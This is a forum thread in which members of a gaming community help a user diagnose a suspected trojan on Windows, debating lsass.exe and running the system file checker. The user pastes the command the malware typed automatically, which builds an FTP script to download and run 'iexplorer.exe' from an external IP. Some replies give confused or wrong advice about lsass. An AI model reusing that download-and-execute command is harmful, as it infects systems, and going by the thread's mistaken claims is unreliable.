Uhm, virus? Help?

[Greek2me]

I think that HijackThis sees it as missing and unknown owner because it's been edited.

This is what I was saying :) Idk about your backdoor thing though.

[Ad Bot]

[Blocklandian¹]

When you open task manager, Is isass.exe capitalized or isn't?

[Blockzillahead]

This is what I was saying :) Idk about your backdoor thing though.

I did so some research

http://www.averscanner.com/scan/2d/lsass-exe.shtml

It can allowed for backdoor remote accessing.

There's a very high chance it's lsass.exe causing this.

http://www.processlibrary.com/directory/files/lsass/23809/

[Blocklandian¹]

Although the site itself is questionable, If i recall correctly it actually can be used for remote backdoor accessing.

[Greek2me]

I did so some research

http://www.averscanner.com/scan/2d/lsass-exe.shtml

It can allowed for backdoor remote accessing.

There's a very high chance it's lsass.exe causing this.

http://www.processlibrary.com/directory/files/lsass/23809/

Stop linking to those sites. Lsass is not something bad (they say it is). It's the login authentication system for Windows. His file might have been modified (which is bad), that's all.

[Evar678]

When you open task manager, Is isass.exe capitalized or isn't?

No, it's not capitalized.

[Blockzillahead]

Stop. Lsass is not something bad. It's the login authentication system for Windows. His file might have been modified (which is bad), that's all.

That's what I'm trying to say. A modified lsass.exe = Trojan. I know it's a normal service that's supposed to be running but it can be edited into a Trojan with backdoors.

[tails]

if lsass was modified a program probably would have noticed. Don't go deleting things at random. Also it should be uncapitalised, People keep capitalising and uncapitalised it on this page.

You should probably just head to C:\Windows\System32 and check when it was last modified.

[Blockzillahead]

if lsass was modified a program probably would have noticed. Don't go deleting things at random. Also it should be uncapitalised, Don't listen to blockzillahead's capitalisation of it.

Yeah I have an odd habit of doing that to words. Ignore it.

[Evar678]

Scan is 97% complete.
Completed.

"Windows Resource Protection found corrupt files but was unable to fix some of them.
Details are included in the CBS.Log windir\Logs\CBS\CBS.log"

CBS.log(zip): https://dl.dropbox.com/u/30951213/Programs/CBS.zip
CBS.log(plain text):  https://dl.dropbox.com/u/30951213/Documents/CBS.log

[Greek2me]

Tails, he's not deleting stuff, he's just using the system file checker.

Try starting command prompt as Administrator and then type this:

Code: [Select]

sfc /scannow

[TheChaosCarrier]

don't listen to blockzilla at least.
i feel like he's going to forget you even more.

[Evar678]

Any luck with the log file?

Actually I'd be surprised if there was, considering its a 5mb file, 30k+ lines..

Edit:
Also, it seems that a value changes everytime this runs, for example, this is what it typed when I posted this op:

Code: [Select]

start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

And this is what it typed about one minute ago:

Code: [Select]

ystemroot%\system32\cmd.exe
del eq&echo open xxx.xxx.xxx.xxx xxxx >> eq&echo user 10515 16135 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
I put x's where the IP was because I'm not sure what it was, I wasn't in a text input area when it started typing, I only got the last two parts of the IP, which was something like 209.418 or something.

[Blocklandian¹]

don't listen to blockzilla at least.
i feel like he's going to forget you even more.

Although blockzillahead may be somewhat confused he just wants to help evar and make sure that he solves the problem, He just needs to stay calm, He already has good cooperation.

[Mardalf]

have you tried antibiotics?